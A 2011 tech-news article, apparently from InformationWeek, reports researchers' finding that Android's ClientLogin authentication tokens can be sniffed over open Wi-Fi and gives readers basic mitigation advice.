Mobile // Mobile Devices
10:06 AM
Core System Testing: How to Achieve Success
Oct 06, 2016
Property and Casualty Insurers have been investing in modernizing their core systems to provide fl ...Read More>>

Android User Data Easily Stolen

Researchers have discovered that most Android devices have holes through which personal data can be snagged by hackers.

Motorola Xoom Teardown: Inside The New Android Tablet
(click image for larger view)
Slideshow: Motorola Xoom Teardown: Inside The New Android Tablet
The weak link when it comes to security on Android devices, say University of Ulm researchers, is the ClientLogin authentication protocol when used on open Wi-Fi networks. This tool is used to authenticate user account details with the Android Market and Google services. It passes the authToken via secured https connections. The problem is the returned authToken, which can remain valid for up to two weeks. When used on insecure http networks, hackers can sniff out the authToken and then use it to access personal data.

The personal data that's left hanging in the breeze is calendar information, contact data, and private Web albums. The researchers note that this means ne'er-do-wells can "view, modify, or delete any contacts, calendar events, or private pictures. This is not limited to items currently being synced but affects all items of that user."

Who does this affect? The researchers tested the authentication protocol across Android versions 2.1, 2.2, 2.2.1, 2.3.3, 2.3.4, and 3.0 across a wide range of handsets, including the HTC Nexus One, HTC Desire, HTC Incredible S, and the Motorola Xoom. Any device running an Android version 2.3.3 and older is more or less wide open. This means 99.7% of all Android phones, according to the most recent statistics from Google (very few devices have been updated to Android 2.3.x yet).

The 2.3.4 system update to Android adds https support for calendar and contacts authentication requests, but leaves Picasa requests still open to attack.

The vulnerability in question applies not just to Google-developed Android applications, but third-party applications as well. Essentially, any app that uses Google's services and the ClientLogin protocol over http rather than https is fair game.

Obviously, leaving this type of data unsecured could be problematic for anyone, but even more so for enterprise users of Android devices. Fortunately, there are some things that can be done to help prevent data theft.

First and foremost, don't use open Wi-Fi networks at all. Use cellular data and, if Wi-Fi is necessary, connect only to protected access points. End-users also can switch off the automatic syncing tools (when using Wi-Fi) in the settings menu. These are relatively easy changes that will provide at least a modicum of protection before a more permanent fix is developers.

As for a permanent fix, updating devices to Android version 2.3.4 is necessary, but that won't be an easy step to take. Generally, even minor system updates are only available from wireless network operators and handset vendors. Given the absolute lack of Android 2.3 on most devices, the probability that you'll be able to update your workforce to Android 2.3.4 in the near future is slim to none.

Beyond these steps, it is up to Google and Android developers to solve this security problem.

In the new, all-digital issue of InformationWeek: Our 2011 Strategic Security Survey shows increased executive interest in security. Here's what you should do next. Download it now. (Free registration required.)

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
Building A Mobile Business Mindset
Building A Mobile Business Mindset
Among 688 respondents, 46% have deployed mobile apps, with an additional 24% planning to in the next year. Soon all apps will look like mobile apps and it's past time for those with no plans to get cracking.
Register for InformationWeek Newsletters
White Papers
Current Issue
Top IT Trends to Watch in Financial Services
IT pros at banks, investment houses, insurance companies, and other financial services organizations are focused on a range of issues, from peer-to-peer lending to cybersecurity to performance, agility, and compliance. It all matters.
Twitter Feed
InformationWeek Radio
Sponsored Live Streaming Video
Everything You've Been Told About Mobility Is Wrong
Attend this video symposium with Sean Wisdom, Global Director of Mobility Solutions, and learn about how you can harness powerful new products to mobilize your business potential.